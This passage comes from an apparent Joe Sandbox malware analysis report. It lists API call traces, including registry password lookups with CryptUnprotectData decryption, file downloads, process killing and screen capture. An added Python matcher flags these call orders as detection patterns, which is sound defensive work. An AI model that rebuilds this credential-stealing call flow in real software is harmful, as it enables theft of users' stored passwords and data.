                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE07D
                                • lstrcat.KERNEL32(?,?), ref: 006BE098
                                • lstrcat.KERNEL32(?,?), ref: 006BE0AC
                                • lstrcat.KERNEL32(?,0132A788), ref: 006BE0C0
                                • lstrcat.KERNEL32(?,?), ref: 006BE0D4
                                • lstrcat.KERNEL32(?,0133DB20), ref: 006BE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006BE126
                                Memory Dump Source
                                • Same source file, associated dumps and IDA snapshot as listed above
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 4f9e076bbbbae18c06d84dd614dd8e1615401425abd2315c02fcdebdceb4fd9e
                                • Instruction ID: 98d740ba8ef71f46e58e1457a65edb156d9304277f5756a2cb3524c146967270
                                • Opcode Fuzzy Hash: 4f9e076bbbbae18c06d84dd614dd8e1615401425abd2315c02fcdebdceb4fd9e
                                • Instruction Fuzzy Hash: 2461A3B191111CEBCB65EB68DC54ADDB7B9BF48300F1049A9F64AA3350EB709F858F90
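Several of the records above are recognisable by their call order alone: the localhost:9229/json request at 006A90FC, the GetEnvironmentVariableA, SetEnvironmentVariableA, LoadLibraryA sequence starting at 006AA026, the desktop capture into an HGLOBAL stream starting at 006C4276, the SHGetFolderPathA(CSIDL 0x1A, which is CSIDL_APPDATA) path build followed by GetFileAttributesA at 006BE037, and the GetModuleFileNameA, ShellExecuteEx, ExitProcess sequence at 006C16A1. The following is an added example, not Joe Sandbox code and not part of this report: a small matcher that parses call-record lines in the format the report uses ("• Api.DLL(args), ref: addr") and checks each function's trace against ordered call patterns. The pattern names are this example's own labels for the call order, not confirmed behaviours of the sample and not Joe Sandbox signature names; the sample traces are copied from the records above.

```python
"""Added example, not from the Joe Sandbox report: ordered API-call pattern
matching over the report's own call-record lines."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Call:
    api: str
    dll: str
    args: str   # raw text between the parentheses, "" when the record has none
    ref: str    # call-site address as printed in the report


# Matches "• InternetOpenA.WININET(006CCFEC,00000001), ref: 006A90DF"
# and the argument-less form "• strlen.MSVCRT ref: 006A91BA".
_LINE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")


def parse_trace(text: str) -> list[Call]:
    """Keep the function's direct calls; the indented 'Part of subcall
    function' lines do not match the pattern and are dropped."""
    calls: list[Call] = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            calls.append(Call(m.group(1), m.group(2), m.group(3) or "", m.group(4)))
    return calls


# Each step is (api name, substrings that must all occur in the argument text).
# A trace matches when the steps occur in this order; unrelated calls may sit
# between them. Names are this example's labels for the call order only.
SIGNATURES: dict[str, list[tuple[str, tuple[str, ...]]]] = {
    "devtools_discovery_endpoint": [("InternetOpenUrlA", ("localhost:", "/json"))],
    "env_var_rewrite_then_loadlibrary": [("GetEnvironmentVariableA", ()),
                                         ("SetEnvironmentVariableA", ()),
                                         ("LoadLibraryA", ())],
    "desktop_capture_to_stream": [("CreateStreamOnHGlobal", ()), ("GetDesktopWindow", ()),
                                  ("GetWindowRect", ()), ("GetHGlobalFromStream", ())],
    # 0x1A is CSIDL_APPDATA; the comma-delimited needle pins it to the CSIDL slot
    "appdata_path_probe": [("SHGetFolderPathA", (",0000001A,",)), ("GetFileAttributesA", ())],
    "module_path_shellexecute_exit": [("GetModuleFileNameA", ()), ("ShellExecuteEx", ()),
                                      ("ExitProcess", ())],
}


def match_signature(calls: list[Call], steps) -> Optional[list[str]]:
    """Ordered subsequence match; returns the refs of the matched steps or None."""
    refs: list[str] = []
    i = 0
    for call in calls:
        api, needles = steps[i]
        if call.api == api and all(n in call.args for n in needles):
            refs.append(call.ref)
            i += 1
            if i == len(steps):
                return refs
    return None


def classify(text: str) -> dict[str, list[str]]:
    """Map every matching pattern name to the call-site refs that matched."""
    calls = parse_trace(text)
    hits: dict[str, list[str]] = {}
    for name, steps in SIGNATURES.items():
        refs = match_signature(calls, steps)
        if refs:
            hits[name] = refs
    return hits


# Sample traces copied from the report records above (a subset of each function's calls).
DEVTOOLS_FN = """\
• InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A90DF
• InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006A90FC
• InternetReadFile.WININET(?,?,?,00000000), ref: 006A9166
• strlen.MSVCRT ref: 006A91BA
  • Part of subcall function 006A8980: std::_Xinvalid_argument.LIBCPMT ref: 006A8996
"""
ENV_FN = """\
• GetEnvironmentVariableA.KERNEL32(013390E8,008D9BD8,0000FFFF), ref: 006AA026
• lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AA053
• SetEnvironmentVariableA.KERNEL32(013390E8,00000000), ref: 006AA12F
• LoadLibraryA.KERNEL32(013261B8), ref: 006AA143
"""
APPDATA_FN = """\
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BE037
• lstrcpy.KERNEL32(00000000,?), ref: 006BE11F
• GetFileAttributesA.KERNEL32(00000000), ref: 006BE126
"""

if __name__ == "__main__":
    for name, trace in (("devtools", DEVTOOLS_FN), ("env", ENV_FN), ("appdata", APPDATA_FN)):
        print(name, classify(trace))
```

The matcher is deliberately order-sensitive: GetEnvironmentVariableA followed by SetEnvironmentVariableA and then LoadLibraryA is worth a look, the same three calls in another order usually are not. Argument needles are plain substrings of the report's argument text, so constants such as the CSIDL value can be pinned without parsing each argument list.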
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A6AFF
                                • InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A6B2C
                                • StrCmpCA.SHLWAPI(?,0133F3B0), ref: 006A6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 006A6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006A6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006A6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 006A6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006A6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 006A6C10
                                • InternetCloseHandle.WININET(00000000), ref: 006A6C17
                                • InternetCloseHandle.WININET(?), ref: 006A6C21
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 00682d3549cc9c54a20167cf7f0a58e4c118d9b1cc27649278f8b9cba78bc648
                                • Instruction ID: b7a8e7e1069a8c369dfd3e75b24e1143b299583f64ec1a32865dc75b4dc82aa4
                                • Opcode Fuzzy Hash: 00682d3549cc9c54a20167cf7f0a58e4c118d9b1cc27649278f8b9cba78bc648
                                • Instruction Fuzzy Hash: DD417CB1A41215ABDB20EB64DC85FAE77BAFF44700F044559FA05E7290EF70AE448BA4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,006B4F39), ref: 006C4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C454C
                                • wsprintfW.USER32 ref: 006C455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006C45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006C45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 006C45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9Ok$%hs$9Ok
                                • API String ID: 885711575-1615165456
                                • Opcode ID: 7189af8b71185dca4cdc5cac0be40075a5b8337fc3a433bebaa1b9197295ff56
                                • Instruction ID: f9bb0378ff58a35d34500b534a66e8d0f4385e5676bf2b68fa5cbe2152b725e0
                                • Opcode Fuzzy Hash: 7189af8b71185dca4cdc5cac0be40075a5b8337fc3a433bebaa1b9197295ff56
                                • Instruction Fuzzy Hash: EB313E72A41209BBEB10DBE4DC45FEE7779FF45700F10415AFA05A7180EF70AA458BA5
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ABC1F
                                • lstrlen.KERNEL32(00000000), ref: 006ABC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ABC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ABC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ABCAC
                                • lstrlen.KERNEL32(006D4AD4), ref: 006ABD23
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: b89e7bfad68254a8e7078bb7ec8ac3f21a07944d716c4bc51202d03853f6b9b4
                                • Instruction ID: d0371e746d9cc7d59fc500247fd4a80e377c8cb04d99d30b98b2bd87c093924b
                                • Opcode Fuzzy Hash: b89e7bfad68254a8e7078bb7ec8ac3f21a07944d716c4bc51202d03853f6b9b4
                                • Instruction Fuzzy Hash: D9A18F70A012068FCB61FF29D959AAEB7B2BF46304F18916DE40A97362DB35DC41CF54
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 006C6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 006C609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: e637eda9c4e87fa9df4233651ef6afd6cb27d22c813625ad420d44a43a3abff0
                                • Instruction ID: 70a3e98368b5d0ff50b2b215b6af473e9b88a00e4e6416ebd6ab3c4e0f1096f3
                                • Opcode Fuzzy Hash: e637eda9c4e87fa9df4233651ef6afd6cb27d22c813625ad420d44a43a3abff0
                                • Instruction Fuzzy Hash: 3D616B70B00644DBDB18CF5CCD95E7EB3B7EB84304B244A5DE4929B781D631AD818B99
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE07D
                                • lstrcat.KERNEL32(?,?), ref: 006BE098
                                • lstrcat.KERNEL32(?,?), ref: 006BE0AC
                                • lstrcat.KERNEL32(?,0132A788), ref: 006BE0C0
                                • lstrcat.KERNEL32(?,?), ref: 006BE0D4
                                • lstrcat.KERNEL32(?,0133DB20), ref: 006BE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006BE126
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 3dac2071ab2296a911068fbad28510ddf6733617c5f9abdecc52b5216a1881fe
                                • Instruction ID: 6242d0ba8fa84764f4d0dd43ca32b443483abd98c91e9977f97035716118d2cf
                                • Opcode Fuzzy Hash: 3dac2071ab2296a911068fbad28510ddf6733617c5f9abdecc52b5216a1881fe
                                • Instruction Fuzzy Hash: FC41B2B191111CEBCB65FB68DC58ADD73B6BF48300F144AA9F64A93251EB309F858F90
                                APIs
                                  • Part of subcall function 006A77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006A7805
                                  • Part of subcall function 006A77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006A784A
                                  • Part of subcall function 006A77D0: StrStrA.SHLWAPI(?,Password), ref: 006A78B8
                                  • Part of subcall function 006A77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 006A78EC
                                  • Part of subcall function 006A77D0: HeapFree.KERNEL32(00000000), ref: 006A78F3
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006A7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 006A7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 006A7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 006A7AF0
                                • wsprintfA.USER32 ref: 006A7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A7B47
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006A7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: 9dfdcc584a28a56cd13467cb40b9b2ca373966c4e594968120129d2b373b0fc5
                                • Instruction ID: 773f3a38a94263f66fe5022adae4f6a5101237fc7e9753937526b21ca6e47732
                                • Opcode Fuzzy Hash: 9dfdcc584a28a56cd13467cb40b9b2ca373966c4e594968120129d2b373b0fc5
                                • Instruction Fuzzy Hash: 983162B2A05614EFCB10EF68DC459ABB77AFB85700F19465AE94A93310DB70ED41CFA0
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B8243
                                • lstrlen.KERNEL32(00000000), ref: 006B8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B8297
                                • lstrlen.KERNEL32(00000000), ref: 006B82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B82EB
                                • lstrlen.KERNEL32(00000000), ref: 006B8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B8337
                                • lstrlen.KERNEL32(00000000), ref: 006B8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B8380
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c257b2a643ea20296e6ce75354a548ced145a540a11b575ba3954679f58f864d
                                • Instruction ID: ed0d246d87892cd471f210df6c6ab0b42b46dd552b9b6d1cb5eac33f82c1e090
                                • Opcode Fuzzy Hash: c257b2a643ea20296e6ce75354a548ced145a540a11b575ba3954679f58f864d
                                • Instruction Fuzzy Hash: 0C515BB1A016129FDB14EF69D858AAAB7EAFF41740F114518AD06DB345EF30ED90CBE0
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006A7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006A784A
                                • StrStrA.SHLWAPI(?,Password), ref: 006A78B8
                                  • Part of subcall function 006A7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 006A775E
                                  • Part of subcall function 006A7750: RtlAllocateHeap.NTDLL(00000000), ref: 006A7765
                                  • Part of subcall function 006A7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006A778D
                                  • Part of subcall function 006A7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006A77AD
                                  • Part of subcall function 006A7750: LocalFree.KERNEL32(?), ref: 006A77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006A78EC
                                • HeapFree.KERNEL32(00000000), ref: 006A78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 006A7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
